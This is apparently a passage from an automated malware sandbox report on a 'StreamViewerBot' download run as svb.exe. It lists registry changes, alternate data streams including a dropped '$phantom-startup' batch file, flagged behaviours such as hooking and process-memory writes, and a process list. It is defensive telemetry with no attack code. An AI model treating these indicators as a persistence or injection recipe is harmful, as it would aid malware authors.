| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133614533598707878" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\0\0\NodeSlot = "8" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133614529070489876" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133614532022682694" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133614532308453669" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "9" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\1\MRUListEx = ffffffff | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133596493963016225" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133614532401578879" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Desktop\New folder\vshz2ot2.newcfg\:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\StreamViewerBot-v24.03.15.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Users\Admin\Desktop\New folder\svb.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\StreamViewerBot.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.bat\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://sourceforge.net/projects/streamviewerbot/files/latest/download
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc018ab58,0x7fffc018ab68,0x7fffc018ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2104 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3392 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4312 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4580 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4624 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3900 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
